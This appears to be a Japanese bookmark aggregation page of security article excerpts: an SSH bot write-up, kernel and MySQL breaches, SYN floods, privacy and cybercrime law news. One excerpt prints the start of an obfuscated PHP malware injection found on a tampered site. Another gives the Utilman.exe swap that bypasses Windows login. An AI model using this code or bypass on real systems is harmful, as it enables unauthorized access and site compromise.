ssh 攻撃を仕掛ける Bot プログラムを入手した a++ My RSS 管理人ブログ
最近やたらと ssh 攻撃の Bot と化してるマシンが多いのですが、先日ふとしたことから ssh 攻撃を仕掛ける Bot サーバー(に仕立てられたマシン)を入手しました。せっかくなのでどんなことになるのかご紹介したいと思います。 ※もちろん私の管理サーバーではありません ^^; #というか、公開していいのか・・・ま、注意喚起ということで。。。 ■1. サーバーへの侵入 まずはサーバーに侵入してくるわけですが、ssh のパスワードを総当りしてきたようです。 #last ... ****** pts/2 pilkington-boome Tue *** ** 05:20 - 05:25 (00:05) こんな感じ。侵入に成功すると短時間で卵を産み付けて帰っていきます。 ■2. 産み付けられた Bot プログラム こんな感じに産み付けられます。(伏字はIPアドレスの一部など) ... /var
2012年1月27日 カーネルコードに脆弱性! Linusみずからパッチを投稿するも… | gihyo.jp
1月17日、Linus Torvalds氏はgit.kernel.orgに自らセキュリティパッチを投稿した。Linux 3.3の開発に忙しいはずのLinusがわざわざセキュリティパッチ? と疑問に思ったが、どうも今回発見された脆弱性は、いつもよりちょっと影響が大きいようだ。 Linusの投稿したパッチ (git.kernel.org) Linusの投稿によれば、この「CVE-2012-0056」と呼ばれる脆弱性はメモリハンドリングのパーミッションチェックに関するもので、放置しておくと攻撃者にルートファイルのアクセス制限を奪われる可能性がある。影響を受けるのはバージョン2.6.39以上のカーネルで、最新のメジャーディストロがこれを放置すれば危険な状態に陥ってしまう。この脆弱性はJüri Aedla氏によって報告された。 当然ながらディストロベンダはLinusが書いたパッチを早急に適用しなくて
TrueCrypt - Free Open-Source On-The-Fly Disk Encryption Software for Windows Vista/XP, Mac OS X and Linux
WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues This page exists only to help migrate existing data encrypted by TrueCrypt. The development of TrueCrypt was ended in 5/2014 after Microsoft terminated support of Windows XP. Windows 8/7/Vista and later offer integrated support for encrypted disks and virtual disk images. Such integrated support is also available on o
脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
SYN flood - Wikipedia
通常のTCP接続。左側のユーザがサーバに接続する場合、3つの段階からなる手順が踏まれる。 SYN Flood 攻撃。攻撃者は SYN パケットを大量に送り、サーバの返答を無視する。サーバは返答が来るか、あるいは一定時間が経過するまで記憶領域を保持しつづけなければならず、この間通常のユーザの接続は受けられない。 SYN flood攻撃 (シン・フラッドこうげき[1][2][3]) とは、インターネットにおけるDoS攻撃(サービス拒否攻撃)のひとつ。インターネット上に公開されているウェブサーバなどの負荷を増大させ、対象となるサイトを一時的に利用不能に陥らせてしまう効果がある。 原理[編集] 一般に、インターネット上の TCP接続は次のような手順で行われる (3ウェイ・ハンドシェイク): クライアントが、サーバに対して TCP SYN パケットを送信する。 SYN パケットを受けとったサーバは、
無線LANのWEP/WPAキーを表示するフリーソフト「WirelessKeyView」 - GIGAZINE
無線LANの設定も昔ほど複雑ではなく、全自動でかなりセキュリティの高い設定ができるようになっている機種も増えていますが、それに伴って「一体自分の無線LANのWEPキーは何なのか?」というのが万が一の際にまったくわからないという事態も増えています。そういう際に役立つのがこのフリーソフト「WirelessKeyView」です。 使い方は至って簡単、起動するだけ。それだけでWindowsのWireless Zero Configurationを使ったWEP/WPAキーが表示されます。ただ表示するだけでなく、テキストファイルにして保存したり、HTML形式のレポートにしたり、クリップボードに直接コピーすることもできます。 ダウンロードと使い方は以下から。 WirelessKeyView: Recover lost WEP/WPA key stored by Wireless Zero Configu
無料でWindowsのパスワードをリセットするUSBメモリを作る方法 - GIGAZINE
「Trinity Rescue Kit」を使うと何らかの都合でパスワードの分からなくなったWindowsのパスワードをリセットできるブートCDの作成が可能なのですが、CDドライブがない場合には作成できません。そこでできるだけ簡単にWindows上からブータブルUSBメモリを作成し、Windowsのパスワードをリセットする手順をまとめてみました。 ◆手順1:「Trinity Rescue Kit」のISOイメージをダウンロード まずは下記公式サイトにアクセスします。 Trinity Rescue Kit: Download - Trinityhome https://trinityhome.org/trinity_rescue_kit_download/ アクセスしたら3つあるリンクの内どれでもいいのでクリックしてISOイメージをダウンロードします。約150MBほどあります。 この「Trin
「あってはならない」個人情報流出の可能性も――ドコモがspモード不具合の経緯を説明
既報の通り、12月20日12時22分から14時25分に、NTTドコモのスマートフォン向けメーラー「spモードメール」で、他ユーザーのアドレスが誤って設定されるという不具合が発生した。これを受け、ドコモは12月21日午前に記者会見を開き、その経緯と今後の対策について説明した。 →ドコモのspモードメール、他ユーザーのアドレスが設定される不具合 不具合の概要については、代表取締役副社長の辻村清行氏が説明。山田隆持社長はインドへ出張中のため会見に出席できなかったが、「山田とは緊密に連絡を取り合い、まず復旧に取り組むこと、事実関係を早期に知らせることについて全力で対応している。お客様への対応にも怠りがないようにと話している」とのこと。 今回の不具合で影響を受けた可能性があるのは、spモードを利用する一部ユーザー。spモードは現在670万ほどの契約があるが、うち約10万ユーザーに影響があった可能性が
違う人に返信してしまう不具合発生中…ドコモ : 経済ニュース : マネー・経済 : YOMIURI ONLINE(読売新聞)
NTTドコモは20日、スマートフォン(高機能携帯電話)の専用メール「spモードメール」に不具合が起きたと発表した。 メールの差出人アドレスが、正しい差出人ではなく実在する第三者のアドレスにすり替わってしまう異常が出ている。不具合は20日正午過ぎから発生している模様で、ドコモには午後11時までに利用者から119件の問い合わせがあった。 差出人アドレスがすり替わったメールに返信すると、誤表示された通りの第三者に送られてしまう。 不具合の原因は不明だが、自分のスマートフォンでメールアドレスを確認して別のアドレスに変わってしまっていた場合は、電源を入れ直すと直るという。 ドコモは利用者に対し、メールアドレス変更などの設定変更や、利用料金の確認など一部のサービスを停止している。
スマホアプリとプライバシーの「越えてはいけない一線」 - @IT
スマートフォンアプリは果たしてどこまで、端末に関する情報を取得してもいいのだろうか。 位置情報と連動してお勧め店舗情報を表示したり、過去の検索履歴を基に商品を提案したりと、端末の情報やユーザーの行動履歴を活用するスマートフォンアプリが登場している。中には便利なものも多いが、一歩間違えれば、ユーザーのプライベートな情報が筒抜けになりかねない。結果として、スマートフォンを活用したビジネスやそれを支える広告市場までもが、否定的な目で見られ、発展を阻害される恐れもある。 この議論が起こったきっかけの1つは、ミログが公開していた「AppLog」と「app.tv」というアプリだ。AppLogはSDKの形で提供され、これを自前のアプリに組み込むと、Android端末にインストールされているアプリの情報やその起動回数を収集し、同社のアプリケーション分析サービスに送信するようになっていた。開発者にはインスト
pixivセキュリティ騒動についてまとめておく
togetterがchromeが固まるくらい重いのと、書いてある内容に同意できてもエタ東となる4時の組み合わせは負けた気分になるので、自分用に。最初に書いておくと、これは特にpixiv擁護ではない。というより、擁護できる部分は特にない。前提知識pixivを潰したがっている人たちというのがいて、連日火をつけようと頑張っている。カオスラウンジとズブズブだったpixivも悪の企業で、騙されているユーザーのためにも俺たち正義の味方が粛清しなければならない。(俺正義タイプ)本の宣伝をしたいが代替サービスのユーザーがまだ少ない。pixivを宣伝用に使い続けるしかないのが歯痒いからpixivを潰したい。(我欲タイプ)かつては普通のpixivユーザーだったが運営への不信が募り、また何らかのしがらみがあり、反転した愛着から今は憎悪しかない。(呪縛霊タイプ)pixivとかユーザーのことなんて全くどうでもいいけ
パスワード認証を回避してWindowsにログインする方法 - うさぎ文学日記
目の前にPCがあるのに、パスワードがわからずログインできないという状況ありますよね。合法的な状況なのであれば、パスワードなしでログインする方法を試してみてはいかがでしょうか。 今日現在、最新状態のWindows7で実行可能です。当たり前ですが、自分に権限のないPCなどで試さないようにして下さいね。 方法は以下の通り簡単です。 Ubuntuなどでブートして、Windowsドライブをマウント C:\Windows\System32以下の「Utilman.exe」を「Utilman.old」にリネーム C:\Windows\System32以下の「cmd.exe」を「Utilman.exe」にコピー 再起動して、Windowsの起動画面で「Windowsキー + U」でコマンドプロンプトが起動 あとは、「explorer.exe」などを実行することもできます。 実験 Ubuntu(ここではBac
お騒がせハッカー集団の中心人物とみられる19歳少年逮捕、部屋の画像などが公開される(イギリス):ザイーガ
ロンドン警視庁は今月21日、国際的企業や情報機関へのサイバー攻撃に関与した疑いでライアン・クリアリー(19)を逮捕したと発表。この男性は、CIAにサイバー攻撃を繰り返したり、ソニーのオンラインサービス「プレイステーション・ネットワーク(PSN)」や任天堂のサイトへの不正侵入を表明したハッカー集団「ラルズセック(ラルズ・セキュリティ)」の中心人物とみられており、各国がサイバー攻撃の封じ込めに全力を注ぐ中、センセーショナルな逮捕として注目を集めています。 そんな中、英デイリーメールにて、この少年にまつわる様々な写真が公開されていました。 ソース:Ryan Cleary charged over cyber attack on CIA as LulzSec takes revenge | Mail Online ライアン・クリアリー容疑者(左側は13歳当時、右側は最近のもの) ライアン・ク
バグを放置したら逮捕? 話題の「ウイルス作成罪」の改正刑法が成立 - はてなニュース
これまで処罰が困難だったコンピューターウイルスを使った犯罪を取り締まるための改正刑法が、6月17日(金)の参議院本会議で可決、成立しました。はてなブックマークでは以前から同改正案の内容に注目が集まっています。この改正案の成立の経緯と、議論の的になった問題点を紹介します。 ▽ コンピューターウイルス作成罪を新設 改正刑法が成立 :日本経済新聞 ▽ 法務省:情報処理の高度化等に対処するための刑法等の一部を改正する法律案 改正刑法の正式名称は「情報処理の高度化等に対処するための刑法等の一部を改正する法律」です。改正案は5月31日の衆議院で可決されており、6月17日の参議院での可決により成立しました。 この改正では、ウイルス(不正指令電磁的記録)の作成者に対して3年以下の懲役または50万円以下の罰金を課します。ウイルスの定義に触れている該当の条文を引用します。 第百六十八条の二 正当な理由がないの
MySQL、ブラインド SQL インジェクションにより情報漏洩が発生 | スラド セキュリティ
MySQL.com と関連するサイトが米国時間 27 日にクラックされ、情報が漏洩した模様。手法はブラインド SQL インジェクションによるものと考えられている (Techie Buzz の記事、本家 /. 記事より) 。 被害に遭ったのは本家 MySQL.com の他、フランス、ドイツ、イタリアの MySQL のサイト。漏洩した情報には MySQL 関係者の Email アドレスや認証情報の他、顧客情報や内部ネットワーク情報も含まれているという。また XSS 脆弱性についても詳細に報告されており漏洩がさらに拡大する恐れもあるとのことで、さらには Sun.com にあるデータベースの内容も既にクラックされている報告もある。 今のところ MySQL からはこの件に関するニュースリリースが出ていないが、是非とも MySQL の矜恃 (そういうものがあるのなら) を賭して対策を施して欲しいもので
PHPで誰でも簡単Webサービス製作!でなんか作って公開した奴ちょっと来い - 甘味志向@はてな
タイトルは出来れば関連する方に読んで欲しかったので、軽く釣り針にしました。すみません。:*) 最近はやりのヒウィッヒヒー(Twitter)でも、よく「○○ったー」みたいなサービスがばんばん登場してますね! おかげでますますツイッターが面白い感じになってて、いい流れですね! でも・・・ちょっと気になることが・・・ 最近「もうプログラマには頼らない!簡単プログラミング!」だとか・・・ 「PHPで誰でも簡単Webサービス作成!」だとか・・・ はてなブックマークのホッテントリで見かけますよね・・・ プログラミングする人が増えるのは素敵です!レッツ・プログラミングなう! なんですけど・・・ ちゃんとセキュリティのこと考えてますか・・・!? 『セキュリティ対策とか難しいし面倒くせーし、俺の適当に作ったサービスとかどうなってもイイしww』 いいんですいいんです! 別にそう思ってるならどうでもいいんです!
ネット通販利用、46万人分の個人情報流出 : 社会 : YOMIURI ONLINE(読売新聞)
インターネット通信販売サイト「サンプル百貨店」利用者の個人情報46万3360人分が流出していたことがわかった。 サイトを運営する「ルーク19」(東京)によると、今年9月頃から、「不動産販売会社から勧誘電話を受けた。会員情報が流出したのでは」といった会員からの苦情が相次ぎ、調べたところ、派遣社員の20歳代の男が会員ほぼすべての情報を名簿業者2社に計33万円で売却したことを認めた。同社は警視庁新宿署に窃盗容疑で被害届を出した。 「サンプル百貨店」は、サンプル品や試供品を無料または格安で会員に提供、会員が使用した感想などを製造元に届けている。データは転売され、11社に渡っているが、同社は「業者にはデータ返却・破棄の同意を取り付けている」としている。
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
5分で絶対に分かるIDS/IPS
Burp Suite - Application Security Testing Software
推測の困難なパスワードを設定してもWindowsのスクリーンロックが数十秒で強制解除される?
